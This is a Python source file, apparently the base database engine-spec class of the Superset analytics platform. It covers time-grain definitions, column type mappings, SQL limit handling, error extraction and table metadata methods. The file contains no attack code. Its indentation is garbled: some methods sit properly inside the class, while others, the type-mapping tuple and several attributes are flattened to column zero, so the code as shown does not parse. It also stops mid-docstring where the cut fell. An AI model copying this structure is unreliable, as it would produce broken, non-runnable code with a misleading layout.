    """One time grain supported by an engine: a display label plus the SQL
    expression template (values come from ``get_time_grain_expressions``)
    and its ISO-8601 duration key (``None`` for "original value")."""
    name: str  # TODO: redundant field, remove
    label: str
    function: str
    duration: Optional[str]
# Mapping from ISO-8601 duration (optionally anchored to an epoch date for
# week-starting/ending variants) to the translatable label shown in the UI.
# `None` means "leave the value untouched" (no grain applied).
builtin_time_grains: Dict[Optional[str], str] = {
    None: __("Original value"),
    "PT1S": __("Second"),
    "PT5S": __("5 second"),
    "PT30S": __("30 second"),
    "PT1M": __("Minute"),
    "PT5M": __("5 minute"),
    "PT10M": __("10 minute"),
    "PT15M": __("15 minute"),
    "PT30M": __("30 minute"),
    "PT1H": __("Hour"),
    "PT6H": __("6 hour"),
    "P1D": __("Day"),
    "P1W": __("Week"),
    "P1M": __("Month"),
    "P3M": __("Quarter"),
    "P1Y": __("Year"),
    "1969-12-28T00:00:00Z/P1W": __("Week starting Sunday"),
    "1969-12-29T00:00:00Z/P1W": __("Week starting Monday"),
    "P1W/1970-01-03T00:00:00Z": __("Week ending Saturday"),
    # Bug fix: label read "Week_ending Sunday" (stray underscore), which is
    # user-facing and breaks the translation key; aligned with the entry above.
    "P1W/1970-01-04T00:00:00Z": __("Week ending Sunday"),
}
class TimestampExpression(ColumnClause):  # pylint: disable=abstract-method
    def __init__(self, expr: str, col: ColumnClause, **kwargs: Any) -> None:
        """SQLAlchemy class that can be used to render native column elements
        respecting engine-specific quoting rules as part of a string-based
        expression.

        :param expr: SQL expression with '{col}' denoting the locations where
            the col object will be rendered.
        :param col: the target column
        """
        super().__init__(expr, **kwargs)
        self.col = col
    @property
    def _constructor(self) -> ColumnClause:
        # Needed to ensure that the column label is rendered correctly when
        # proxied to the outer query.
        # See https://github.com/sqlalchemy/sqlalchemy/issues/4730
        return ColumnClause
@compiles(TimestampExpression)
def compile_timegrain_expression(
    element: TimestampExpression, compiler: Compiled, **kwargs: Any
) -> str:
    """Render a TimestampExpression by substituting the compiled target
    column into the '{col}' placeholder of the expression template."""
    return element.name.replace("{col}", compiler.process(element.col, **kwargs))
class LimitMethod:  # pylint: disable=too-few-public-methods
    """Enum the ways that limits can be applied"""
    FETCH_MANY = "fetch_many"  # presumably limit via cursor fetchmany — confirm in callers
    WRAP_SQL = "wrap_sql"  # presumably wrap the query and apply an outer LIMIT
    FORCE_LIMIT = "force_limit"  # default for this base spec (see limit_method below)
class BaseEngineSpec:  # pylint: disable=too-many-public-methods
    """Abstract class for database engine specific configurations
    Attributes:
        allows_alias_to_source_column: Whether the engine is able to pick the
                                       source column for aggregation clauses
                                       used in ORDER BY when a column in SELECT
                                       has an alias that is the same as a source
                                       column.
        allows_hidden_orderby_agg:     Whether the engine allows ORDER BY to
                                       directly use aggregation clauses, without
                                       having to add the same aggregation in SELECT.
    """
    engine = "base"  # str as defined in sqlalchemy.engine.engine
    engine_aliases: Set[str] = set()
    engine_name: Optional[str] = None  # for user messages, overridden in child classes
    # Per-type date-trunc function names, substituted into the "{func}"
    # placeholder of time-grain expressions (see get_timestamp_expr).
    _date_trunc_functions: Dict[str, str] = {}
    # {ISO duration (e.g. "P1D") -> SQL expression template with "{col}"}.
    _time_grain_expressions: Dict[Optional[str], str] = {}
column_type_mappings: Tuple[ColumnTypeMapping, ...] = (
(
re.compile(r"^string", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^n((var)?char|text)", re.IGNORECASE),
types.UnicodeText(),
GenericDataType.STRING,
),
(
re.compile(r"^(var)?char", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^(tiny|medium|long)?text", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^smallint", re.IGNORECASE),
types.SmallInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^int(eger)?", re.IGNORECASE),
types.Integer(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^bigint", re.IGNORECASE),
types.BigInteger(),
GenericDataType.NUMERIC,
),
(re.compile(r"^long", re.IGNORECASE), types.Float(), GenericDataType.NUMERIC,),
(
re.compile(r"^decimal", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^numeric", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(re.compile(r"^float", re.IGNORECASE), types.Float(), GenericDataType.NUMERIC,),
(
re.compile(r"^double", re.IGNORECASE),
types.Float(),
GenericDataType.NUMERIC,
),
(re.compile(r"^real", re.IGNORECASE), types.REAL, GenericDataType.NUMERIC,),
(
re.compile(r"^smallserial", re.IGNORECASE),
types.SmallInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^serial", re.IGNORECASE),
types.Integer(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^bigserial", re.IGNORECASE),
types.BigInteger(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^money", re.IGNORECASE),
types.Numeric(),
GenericDataType.NUMERIC,
),
(
re.compile(r"^timestamp", re.IGNORECASE),
types.TIMESTAMP(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^datetime", re.IGNORECASE),
types.DateTime(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^date", re.IGNORECASE),
types.DateTime(),
GenericDataType.TEMPORAL,
),
(re.compile(r"^time", re.IGNORECASE), types.Time(), GenericDataType.TEMPORAL,),
(
re.compile(r"^interval", re.IGNORECASE),
types.Interval(),
GenericDataType.TEMPORAL,
),
(
re.compile(r"^bool(ean)?", re.IGNORECASE),
types.Boolean(),
GenericDataType.BOOLEAN,
),
)
# Does database support join-free timeslot grouping
time_groupby_inline = False
limit_method = LimitMethod.FORCE_LIMIT
time_secondary_columns = False
allows_joins = True
allows_subqueries = True
allows_alias_in_select = True
allows_alias_in_orderby = True
allows_sql_comments = True
allows_escaped_colons = True
# Whether ORDER BY clause can use aliases created in SELECT
# that are the same as a source column
allows_alias_to_source_column = True
# Whether ORDER BY clause must appear in SELECT
# if TRUE, then it doesn't have to.
allows_hidden_ordeby_agg = True
# Whether ORDER BY clause can use sql caculated expression
# if True, use alias of select column for `order by`
# the True is safely for most database
# But for backward compatibility, False by default
allows_hidden_cc_in_orderby = False
force_column_alias_quotes = False
arraysize = 0
max_column_name_length = 0
try_remove_schema_from_table_name = True # pylint: disable=invalid-name
run_multiple_statements_as_one = False
custom_errors: Dict[
Pattern[str], Tuple[str, SupersetErrorType, Dict[str, Any]]
] = {}
@classmethod
def get_dbapi_exception_mapping(cls) -> Dict[Type[Exception], Type[Exception]]:
"""
Each engine can implement and converge its own specific exceptions into
Superset DBAPI exceptions
Note: On python 3.9 this method can be changed to a classmethod property
without the need of implementing a metaclass type
:return: A map of driver specific exception to superset custom exceptions
"""
return {}
@classmethod
def get_dbapi_mapped_exception(cls, exception: Exception) -> Exception:
"""
Get a superset custom DBAPI exception from the driver specific exception.
Override if the engine needs to perform extra changes to the exception, for
example change the exception message or implement custom more complex logic
:param exception: The driver specific exception
:return: Superset custom DBAPI exception
"""
new_exception = cls.get_dbapi_exception_mapping().get(type(exception))
if not new_exception:
return exception
return new_exception(str(exception))
@classmethod
def get_allow_cost_estimate( # pylint: disable=unused-argument
cls, extra: Dict[str, Any],
) -> bool:
return False
@classmethod
def get_text_clause(cls, clause: str) -> TextClause:
"""
SQLALchemy wrapper to ensure text clauses are escaped properly
:param clause: string clause with potentially unescaped characters
:return: text clause with escaped characters
"""
if cls.allows_escaped_colons:
clause = clause.replace(":", "\\:")
return text(clause)
@classmethod
def get_engine(
cls,
database: "Database",
schema: Optional[str] = None,
source: Optional[utils.QuerySource] = None,
) -> Engine:
user_name = utils.get_username()
return database.get_sqla_engine(
schema=schema, nullpool=True, user_name=user_name, source=source
)
    @classmethod
    def get_timestamp_expr(
        cls,
        col: ColumnClause,
        pdf: Optional[str],
        time_grain: Optional[str],
        type_: Optional[str] = None,
    ) -> TimestampExpression:
        """
        Construct a TimestampExpression to be used in a SQLAlchemy query.

        :param col: Target column for the TimestampExpression
        :param pdf: date format (seconds or milliseconds)
        :param time_grain: time grain, e.g. P1Y for 1 year
        :param type_: the source column type
        :return: TimestampExpression object
        :raises NotImplementedError: if the engine has no expression for the
            requested time grain
        """
        if time_grain:
            time_expr = cls.get_time_grain_expressions().get(time_grain)
            if not time_expr:
                raise NotImplementedError(
                    f"No grain spec for {time_grain} for database {cls.engine}"
                )
            # Fill engine-specific placeholders: "{func}" becomes the engine's
            # date-trunc function for this column type, "{type}" the raw type
            # name itself (both only when a trunc function is known for type_).
            if type_ and "{func}" in time_expr:
                date_trunc_function = cls._date_trunc_functions.get(type_)
                if date_trunc_function:
                    time_expr = time_expr.replace("{func}", date_trunc_function)
            if type_ and "{type}" in time_expr:
                date_trunc_function = cls._date_trunc_functions.get(type_)
                if date_trunc_function:
                    time_expr = time_expr.replace("{type}", type_)
        else:
            # No grain requested: pass the column through untouched.
            time_expr = "{col}"
        # if epoch, translate to DATE using db specific conf
        if pdf == "epoch_s":
            time_expr = time_expr.replace("{col}", cls.epoch_to_dttm())
        elif pdf == "epoch_ms":
            time_expr = time_expr.replace("{col}", cls.epoch_ms_to_dttm())
        return TimestampExpression(time_expr, col, type_=col.type)
@classmethod
def get_time_grains(cls) -> Tuple[TimeGrain, ...]:
"""
Generate a tuple of supported time grains.
:return: All time grains supported by the engine
"""
ret_list = []
time_grains = builtin_time_grains.copy()
time_grains.update(current_app.config["TIME_GRAIN_ADDONS"])
for duration, func in cls.get_time_grain_expressions().items():
if duration in time_grains:
name = time_grains[duration]
ret_list.append(TimeGrain(name, _(name), func, duration))
return tuple(ret_list)
    @classmethod
    def _sort_time_grains(
        cls, val: Tuple[Optional[str], str], index: int
    ) -> Union[float, int, str]:
        """
        Return an ordered time-based value of a portion of a time grain
        for sorting
        Values are expected to be either None or start with P or PT
        Have a numerical value in the middle and end with
        a value for the time interval
        It can also start or end with epoch start time denoting a range
        i.e, week beginning or ending with a day
        """
        # Coarse buckets: None first, epoch-anchored week variants last.
        pos = {
            "FIRST": 0,
            "SECOND": 1,
            "THIRD": 2,
            "LAST": 3,
        }
        if val[0] is None:
            return pos["FIRST"]
        # Groups: (1) optional leading epoch anchor, (2) P/PT, (3) magnitude,
        # (4) interval letter, (5) optional trailing epoch anchor.
        prog = re.compile(r"(.*\/)?(P|PT)([0-9\.]+)(S|M|H|D|W|M|Y)(\/.*)?")
        result = prog.match(val[0])
        # for any time grains that don't match the format, put them at the end
        if result is None:
            return pos["LAST"]
        second_minute_hour = ["S", "M", "H"]
        day_week_month_year = ["D", "W", "M", "Y"]
        is_less_than_day = result.group(2) == "PT"
        interval = result.group(4)
        epoch_time_start_string = result.group(1) or result.group(5)
        has_starting_or_ending = bool(len(epoch_time_start_string or ""))
        def sort_day_week() -> int:
            # Epoch-anchored grains (week starting/ending X) always sort last.
            if has_starting_or_ending:
                return pos["LAST"]
            if is_less_than_day:
                return pos["SECOND"]
            return pos["THIRD"]
        def sort_interval() -> float:
            # Rank the interval letter within its own group (sub-day vs day+).
            if is_less_than_day:
                return second_minute_hour.index(interval)
            return day_week_month_year.index(interval)
        # 0: all "PT" values should come before "P" values (i.e, PT10M)
        # 1: order values within the above arrays ("D" before "W")
        # 2: sort by numeric value (PT10M before PT15M)
        # 3: sort by any week starting/ending values
        plist = {
            0: sort_day_week(),
            1: pos["SECOND"] if is_less_than_day else pos["THIRD"],
            2: sort_interval(),
            3: float(result.group(3)),
        }
        return plist.get(index, 0)
@classmethod
def get_time_grain_expressions(cls) -> Dict[Optional[str], str]:
    """
    Return a dict of all supported time grains including any potential added grains
    but excluding any potentially disabled grains in the config file.

    :return: All time grain expressions supported by the engine, sorted from
        finest to coarsest grain
    """
    # TODO: use @memoize decorator or similar to avoid recomputation on every call
    time_grain_expressions = cls._time_grain_expressions.copy()
    grain_addon_expressions = current_app.config["TIME_GRAIN_ADDON_EXPRESSIONS"]
    time_grain_expressions.update(grain_addon_expressions.get(cls.engine, {}))
    denylist: List[str] = current_app.config["TIME_GRAIN_DENYLIST"]
    for key in denylist:
        # Use a default so a denylisted grain that this particular engine
        # doesn't define can't raise a KeyError.
        time_grain_expressions.pop(key, None)
    return dict(
        sorted(
            time_grain_expressions.items(),
            key=lambda x: (
                cls._sort_time_grains(x, 0),
                cls._sort_time_grains(x, 1),
                cls._sort_time_grains(x, 2),
                cls._sort_time_grains(x, 3),
            ),
        )
    )
@classmethod
def fetch_data(
    cls, cursor: Any, limit: Optional[int] = None
) -> List[Tuple[Any, ...]]:
    """
    Fetch the result set from an already-executed cursor.

    :param cursor: Cursor instance
    :param limit: Maximum number of rows to be returned by the cursor
    :return: Result of query
    :raises Exception: driver errors remapped via ``get_dbapi_mapped_exception``
    """
    if cls.arraysize:
        # Tune how many rows the driver fetches per round trip.
        cursor.arraysize = cls.arraysize
    try:
        if cls.limit_method == LimitMethod.FETCH_MANY and limit:
            # Engine enforces the limit client-side instead of via SQL.
            return cursor.fetchmany(limit)
        return cursor.fetchall()
    except Exception as ex:
        # Translate driver-specific exceptions into Superset ones.
        raise cls.get_dbapi_mapped_exception(ex)
@classmethod
def expand_data(
cls, columns: List[Dict[Any, Any]], data: List[Dict[Any, Any]]
) -> Tuple[List[Dict[Any, Any]], List[Dict[Any, Any]], List[Dict[Any, Any]]]:
"""
Some engines support expanding nested fields. See implementation in Presto
spec for details.
:param columns: columns selected in the query
:param data: original data set
:return: list of all columns(selected columns and their nested fields),
expanded data set, listed of nested fields
"""
return columns, data, []
@classmethod
def alter_new_orm_column(cls, orm_col: "TableColumn") -> None:
    """Allow altering default column attributes when first detected/added

    For instance special column like `__time` for Druid can be
    set to is_dttm=True. Note that this only gets called when new
    columns are detected/created

    :param orm_col: newly created ORM column, mutated in place by overrides
    """
    # Default implementation is a no-op; engine specs override as needed.
    # TODO: Fix circular import caused by importing TableColumn
@classmethod
def epoch_to_dttm(cls) -> str:
    """
    SQL expression that converts epoch (seconds) to datetime that can be used in a
    query. The reference column should be denoted as `{col}` in the return
    expression, e.g. "FROM_UNIXTIME({col})"

    :return: SQL Expression
    :raises NotImplementedError: always; concrete engine specs must override
    """
    raise NotImplementedError()
@classmethod
def epoch_ms_to_dttm(cls) -> str:
    """
    SQL expression that converts epoch (milliseconds) to datetime that can be used
    in a query.

    Reuses the seconds-based conversion, dividing the column by 1000 first.

    :return: SQL Expression
    """
    seconds_expression = cls.epoch_to_dttm()
    return seconds_expression.replace("{col}", "({col}/1000)")
@classmethod
def get_datatype(cls, type_code: Any) -> Optional[str]:
"""
Change column type code from cursor description to string representation.
:param type_code: Type code from cursor description
:return: String representation of type code
"""
if isinstance(type_code, str) and type_code != "":
return type_code.upper()
return None
@classmethod
def normalize_indexes(cls, indexes: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """
    Normalizes indexes for more consistency across db engines

    noop by default

    :param indexes: Raw indexes as returned by SQLAlchemy
    :return: cleaner, more aligned index definition
    """
    # Base implementation: pass-through; engines with quirky index metadata
    # override this.
    return indexes
@classmethod
def extra_table_metadata(  # pylint: disable=unused-argument
    cls, database: "Database", table_name: str, schema_name: str,
) -> Dict[str, Any]:
    """
    Returns engine-specific table metadata

    :param database: Database instance
    :param table_name: Table name
    :param schema_name: Schema name
    :return: Engine-specific table metadata; empty by default
    """
    # TODO: Fix circular import caused by importing Database
    # Base implementation exposes no extra metadata.
    return {}
@classmethod
def apply_limit_to_sql(
    cls, sql: str, limit: int, database: "Database", force: bool = False
) -> str:
    """
    Alters the SQL statement to apply a LIMIT clause

    :param sql: SQL query
    :param limit: Maximum number of rows to be returned by the query
    :param database: Database instance
    :param force: If True, replace any pre-existing limit even if it is lower
    :return: SQL query with limit clause
    """
    # TODO: Fix circular import caused by importing Database
    if cls.limit_method == LimitMethod.WRAP_SQL:
        # Wrap the original statement in an outer SELECT ... LIMIT.
        sql = sql.strip("\t\n ;")
        qry = (
            select("*")
            .select_from(TextAsFrom(text(sql), ["*"]).alias("inner_qry"))
            .limit(limit)
        )
        return database.compile_sqla_query(qry)
    if cls.limit_method == LimitMethod.FORCE_LIMIT:
        # Rewrite/insert the LIMIT clause directly in the parsed statement.
        parsed_query = sql_parse.ParsedQuery(sql)
        sql = parsed_query.set_or_update_query_limit(limit, force=force)
    # LimitMethod.FETCH_MANY falls through: the limit is applied client-side
    # in fetch_data instead of in the SQL text.
    return sql
@classmethod
def get_limit_from_sql(cls, sql: str) -> Optional[int]:
    """
    Extract limit from SQL query

    :param sql: SQL query
    :return: Value of limit clause in query, or None if there is none
    """
    parsed_query = sql_parse.ParsedQuery(sql)
    return parsed_query.limit
@classmethod
def set_or_update_query_limit(cls, sql: str, limit: int) -> str:
    """
    Create a query based on original query but with new limit clause

    :param sql: SQL query
    :param limit: New limit to insert/replace into query
    :return: Query with new limit
    """
    return sql_parse.ParsedQuery(sql).set_or_update_query_limit(limit)
@classmethod
def df_to_sql(
    cls,
    database: "Database",
    table: Table,
    df: pd.DataFrame,
    to_sql_kwargs: Dict[str, Any],
) -> None:
    """
    Upload data from a Pandas DataFrame to a database.

    For regular engines this calls the `pandas.DataFrame.to_sql` method. Can be
    overridden for engines that don't work well with this method, e.g. Hive and
    BigQuery.

    Note this method does not create metadata for the table.

    :param database: The database to upload the data to
    :param table: The table to upload the data to
    :param df: The dataframe with data to be uploaded
    :param to_sql_kwargs: The kwargs to be passed to pandas.DataFrame.to_sql` method
    """
    engine = cls.get_engine(database)
    # NOTE: mutates the caller-supplied kwargs dict in place.
    to_sql_kwargs["name"] = table.table

    if table.schema:
        # Only add schema when it is preset and non empty.
        to_sql_kwargs["schema"] = table.schema

    if engine.dialect.supports_multivalues_insert:
        # Batch rows into multi-row INSERTs for speed where supported.
        to_sql_kwargs["method"] = "multi"

    df.to_sql(con=engine, **to_sql_kwargs)
@classmethod
def convert_dttm(  # pylint: disable=unused-argument
    cls, target_type: str, dttm: datetime, db_extra: Optional[Dict[str, Any]] = None
) -> Optional[str]:
    """
    Convert Python datetime object to a SQL expression

    :param target_type: The target type of expression
    :param dttm: The datetime object
    :param db_extra: The database extra object
    :return: The SQL expression; ``None`` means no engine-specific conversion
        is available
    """
    return None
@classmethod
def get_all_datasource_names(
    cls, database: "Database", datasource_type: str
) -> List[utils.DatasourceName]:
    """Returns a list of all tables or views in database.

    :param database: Database instance
    :param datasource_type: Datasource_type can be 'table' or 'view'
    :return: List of all datasources in database or schema
    :raises Exception: if ``datasource_type`` is neither 'table' nor 'view'
    """
    # TODO: Fix circular import caused by importing Database
    # force=True bypasses the cache so the schema list is fresh.
    schemas = database.get_all_schema_names(
        cache=database.schema_cache_enabled,
        cache_timeout=database.schema_cache_timeout,
        force=True,
    )
    all_datasources: List[utils.DatasourceName] = []
    for schema in schemas:
        if datasource_type == "table":
            all_datasources += database.get_all_table_names_in_schema(
                schema=schema,
                force=True,
                cache=database.table_cache_enabled,
                cache_timeout=database.table_cache_timeout,
            )
        elif datasource_type == "view":
            all_datasources += database.get_all_view_names_in_schema(
                schema=schema,
                force=True,
                cache=database.table_cache_enabled,
                cache_timeout=database.table_cache_timeout,
            )
        else:
            raise Exception(f"Unsupported datasource_type: {datasource_type}")
    return all_datasources
@classmethod
def handle_cursor(cls, cursor: Any, query: Query, session: Session) -> None:
    """Handle a live cursor between the execute and fetchall calls

    The flow works without this method doing anything, but it allows
    for handling the cursor and updating progress information in the
    query object

    :param cursor: live DB-API cursor
    :param query: Query model instance to update with progress
    :param session: SQLAlchemy ORM session used for persisting updates
    """
    # TODO: Fix circular import error caused by importing sql_lab.Query
@classmethod
def extract_error_message(cls, ex: Exception) -> str:
    """Return the engine-prefixed, human-readable message for *ex*."""
    return f"{cls.engine} error: {cls._extract_error_message(ex)}"
@classmethod
def _extract_error_message(cls, ex: Exception) -> str:
    """Extract error message for queries

    Engines override this to unwrap driver-specific exception payloads.
    """
    return utils.error_msg_from_exception(ex)
@classmethod
def extract_errors(
    cls, ex: Exception, context: Optional[Dict[str, Any]] = None
) -> List[SupersetError]:
    """
    Convert an exception into a list of structured SupersetError objects.

    Each engine spec can register ``custom_errors`` mapping a compiled regex
    to a (message template, error type, extra) triple; the first regex that
    matches the raw message wins.

    :param ex: exception raised by the engine/driver
    :param context: extra values available for message interpolation
    :return: list with a single structured error (custom or generic)
    """
    raw_message = cls._extract_error_message(ex)

    context = context or {}
    for regex, (message, error_type, extra) in cls.custom_errors.items():
        match = regex.search(raw_message)
        if match:
            # Named regex groups plus caller context feed the %-template.
            params = {**context, **match.groupdict()}
            extra["engine_name"] = cls.engine_name
            return [
                SupersetError(
                    error_type=error_type,
                    message=message % params,
                    level=ErrorLevel.ERROR,
                    extra=extra,
                )
            ]

    # No custom match: fall back to a generic database error.
    return [
        SupersetError(
            error_type=SupersetErrorType.GENERIC_DB_ENGINE_ERROR,
            message=cls._extract_error_message(ex),
            level=ErrorLevel.ERROR,
            extra={"engine_name": cls.engine_name},
        )
    ]
@classmethod
def adjust_database_uri(cls, uri: URL, selected_schema: Optional[str]) -> None:
    """
    Mutate the database component of the SQLAlchemy URI.

    The URI here represents the URI as entered when saving the database,
    ``selected_schema`` is the schema currently active presumably in
    the SQL Lab dropdown. Based on that, for some database engine,
    we can return a new altered URI that connects straight to the
    active schema, meaning the users won't have to prefix the object
    names by the schema name.

    Some databases engines have 2 level of namespacing: database and
    schema (postgres, oracle, mssql, ...)
    For those it's probably better to not alter the database
    component of the URI with the schema name, it won't work.

    Some database drivers like presto accept '{catalog}/{schema}' in
    the database component of the URL, that can be handled here.
    """
    # Default implementation is a no-op; overrides mutate ``uri`` in place.
@classmethod
def patch(cls) -> None:
    """
    Hook for engine specs that need to monkey-patch their driver at startup.

    No-op by default.

    TODO: Improve docstring and refactor implementation in Hive
    """
@classmethod
def get_schema_names(cls, inspector: Inspector) -> List[str]:
"""
Get all schemas from database
:param inspector: SqlAlchemy inspector
:return: All schemas in the database
"""
return sorted(inspector.get_schema_names())
@classmethod
def get_table_names( # pylint: disable=unused-argument
cls, database: "Database", inspector: Inspector, schema: Optional[str],
) -> List[str]:
"""
Get all tables from schema
:param database: The database to get info
:param inspector: SqlAlchemy inspector
:param schema: Schema to inspect. If omitted, uses default schema for database
:return: All tables in schema
"""
tables = inspector.get_table_names(schema)
if schema and cls.try_remove_schema_from_table_name:
tables = [re.sub(f"^{schema}\\.", "", table) for table in tables]
return sorted(tables)
@classmethod
def get_view_names( # pylint: disable=unused-argument
cls, database: "Database", inspector: Inspector, schema: Optional[str],
) -> List[str]:
"""
Get all views from schema
:param database: The database to get info
:param inspector: SqlAlchemy inspector
:param schema: Schema name. If omitted, uses default schema for database
:return: All views in schema
"""
views = inspector.get_view_names(schema)
if schema and cls.try_remove_schema_from_table_name:
views = [re.sub(f"^{schema}\\.", "", view) for view in views]
return sorted(views)
@classmethod
def get_table_comment(
cls, inspector: Inspector, table_name: str, schema: Optional[str]
) -> Optional[str]:
"""
Get comment of table from a given schema and table
:param inspector: SqlAlchemy Inspector instance
:param table_name: Table name
:param schema: Schema name. If omitted, uses default schema for database
:return: comment of table
"""
comment = None
try:
comment = inspector.get_table_comment(table_name, schema)
comment = comment.get("text") if isinstance(comment, dict) else None
except NotImplementedError:
# It's expected that some dialects don't implement the comment method
pass
except Exception as ex: # pylint: disable=broad-except
logger.error("Unexpected error while fetching table comment", exc_info=True)
logger.exception(ex)
return comment
@classmethod
def get_columns(
cls, inspector: Inspector, table_name: str, schema: Optional[str]
) -> List[Dict[str, Any]]:
"""
Get all columns from a given schema and table
:param inspector: SqlAlchemy Inspector instance
:param table_name: Table name
:param schema: Schema name. If omitted, uses default schema for database
:return: All columns in table
"""
return inspector.get_columns(table_name, schema)
@classmethod
def where_latest_partition(  # pylint: disable=too-many-arguments,unused-argument
    cls,
    table_name: str,
    schema: Optional[str],
    database: "Database",
    query: Select,
    columns: Optional[List[Dict[str, str]]] = None,
) -> Optional[Select]:
    """
    Add a where clause to a query to reference only the most recent partition

    :param table_name: Table name
    :param schema: Schema name
    :param database: Database instance
    :param query: SqlAlchemy query
    :param columns: List of TableColumns
    :return: SqlAlchemy query with additional where clause referencing the latest
    partition, or ``None`` when the engine has no partition support
    """
    # TODO: Fix circular import caused by importing Database, TableColumn
    # Base implementation: no partition support.
    return None
@classmethod
def _get_fields(cls, cols: List[Dict[str, Any]]) -> List[Any]:
    """Turn column metadata dicts into SQLAlchemy column clauses."""
    return [column(c["name"]) for c in cols]
@classmethod
def select_star(  # pylint: disable=too-many-arguments,too-many-locals
    cls,
    database: "Database",
    table_name: str,
    engine: Engine,
    schema: Optional[str] = None,
    limit: int = 100,
    show_cols: bool = False,
    indent: bool = True,
    latest_partition: bool = True,
    cols: Optional[List[Dict[str, Any]]] = None,
) -> str:
    """
    Generate a "SELECT * from [schema.]table_name" query with appropriate limit.

    WARNING: expects only unquoted table and schema names.

    :param database: Database instance
    :param table_name: Table name, unquoted
    :param engine: SqlAlchemy Engine instance
    :param schema: Schema, unquoted
    :param limit: limit to impose on query
    :param show_cols: Show columns in query; otherwise use "*"
    :param indent: Add indentation to query
    :param latest_partition: Only query the latest partition
    :param cols: Columns to include in query
    :return: SQL query
    """
    # pylint: disable=redefined-outer-name
    fields: Union[str, List[Any]] = "*"
    cols = cols or []
    # Column metadata is needed both for explicit column lists and for
    # partition pruning; fetch it only when not supplied by the caller.
    if (show_cols or latest_partition) and not cols:
        cols = database.get_columns(table_name, schema)

    if show_cols:
        fields = cls._get_fields(cols)

    # Quote identifiers with the dialect's own rules.
    quote = engine.dialect.identifier_preparer.quote
    if schema:
        full_table_name = quote(schema) + "." + quote(table_name)
    else:
        full_table_name = quote(table_name)

    qry = select(fields).select_from(text(full_table_name))

    if limit:
        qry = qry.limit(limit)
    if latest_partition:
        # Engines with partition support narrow the query to the newest one.
        partition_query = cls.where_latest_partition(
            table_name, schema, database, qry, columns=cols
        )
        if partition_query is not None:
            qry = partition_query
    sql = database.compile_sqla_query(qry)
    if indent:
        sql = sqlparse.format(sql, reindent=True)
    return sql
@classmethod
def estimate_statement_cost(cls, statement: str, cursor: Any) -> Dict[str, Any]:
    """
    Generate a SQL query that estimates the cost of a given statement.

    :param statement: A single SQL statement
    :param cursor: Cursor instance
    :return: Dictionary with different costs
    :raises Exception: always; engines supporting estimation must override
    """
    raise Exception("Database does not support cost estimation")
@classmethod
def query_cost_formatter(
    cls, raw_cost: List[Dict[str, Any]]
) -> List[Dict[str, str]]:
    """
    Format cost estimate.

    :param raw_cost: Raw estimate from `estimate_query_cost`
    :return: Human readable cost estimate
    :raises Exception: always; engines supporting estimation must override
    """
    raise Exception("Database does not support cost estimation")
@classmethod
def process_statement(
    cls, statement: str, database: "Database", user_name: str
) -> str:
    """
    Process a SQL statement by stripping and mutating it.

    :param statement: A single SQL statement
    :param database: Database instance
    :param user_name: Effective username
    :return: Stripped and mutated SQL statement
    """
    parsed_query = ParsedQuery(statement)
    sql = parsed_query.stripped()

    # Apply the deployment-configured SQL mutator, if any (e.g. for
    # injecting audit comments or row-level security).
    sql_query_mutator = current_app.config["SQL_QUERY_MUTATOR"]
    if sql_query_mutator:
        sql = sql_query_mutator(sql, user_name, security_manager, database)

    return sql
@classmethod
def estimate_query_cost(
    cls,
    database: "Database",
    schema: str,
    sql: str,
    source: Optional[utils.QuerySource] = None,
) -> List[Dict[str, Any]]:
    """
    Estimate the cost of a multiple statement SQL query.

    :param database: Database instance
    :param schema: Database schema
    :param sql: SQL query with possibly multiple statements
    :param source: Source of the query (eg, "sql_lab")
    :return: one cost dict per statement, in statement order
    :raises Exception: if the database does not support cost estimation
    """
    extra = database.get_extra() or {}
    if not cls.get_allow_cost_estimate(extra):
        raise Exception("Database does not support cost estimation")

    # Effective user from the Flask request context, if any.
    user_name = g.user.username if g.user and hasattr(g.user, "username") else None
    parsed_query = sql_parse.ParsedQuery(sql)
    statements = parsed_query.get_statements()

    engine = cls.get_engine(database, schema=schema, source=source)
    costs = []
    # ``closing`` guarantees the raw connection is released even on error.
    with closing(engine.raw_connection()) as conn:
        cursor = conn.cursor()
        for statement in statements:
            # Each statement is stripped/mutated before estimation.
            processed_statement = cls.process_statement(
                statement, database, user_name
            )
            costs.append(cls.estimate_statement_cost(processed_statement, cursor))
    return costs
@classmethod
def modify_url_for_impersonation(
cls, url: URL, impersonate_user: bool, username: Optional[str]
) -> None:
"""
Modify the SQL Alchemy URL object with the user to impersonate if applicable.
:param url: SQLAlchemy URL object
:param impersonate_user: Flag indicating if impersonation is enabled
:param username: Effective username
"""
if impersonate_user and username is not None:
url.username = username
@classmethod
def update_impersonation_config(
    cls, connect_args: Dict[str, Any], uri: str, username: Optional[str],
) -> None:
    """
    Update a configuration dictionary
    that can set the correct properties for impersonating users

    :param connect_args: config to be updated
    :param uri: URI
    :param username: Effective username
    :return: None
    """
    # Default implementation is a no-op; engines with driver-level
    # impersonation (e.g. via connect_args) override this.
@classmethod
def execute(  # pylint: disable=unused-argument
    cls, cursor: Any, query: str, **kwargs: Any,
) -> None:
    """
    Execute a SQL query

    :param cursor: Cursor instance
    :param query: Query to execute
    :param kwargs: kwargs to be passed to cursor.execute(); accepted for
        interface compatibility but unused in the base implementation
    :return:
    :raises Exception: driver errors remapped via ``get_dbapi_mapped_exception``
    """
    if not cls.allows_sql_comments:
        # Some engines choke on comments; strip them before executing.
        query = sql_parse.strip_comments_from_sql(query)

    if cls.arraysize:
        cursor.arraysize = cls.arraysize
    try:
        cursor.execute(query)
    except Exception as ex:
        raise cls.get_dbapi_mapped_exception(ex)
@classmethod
def make_label_compatible(cls, label: str) -> Union[str, quoted_name]:
    """
    Conditionally mutate and/or quote a sqlalchemy expression label. If
    force_column_alias_quotes is set to True, return the label as a
    sqlalchemy.sql.elements.quoted_name object to ensure that the select query
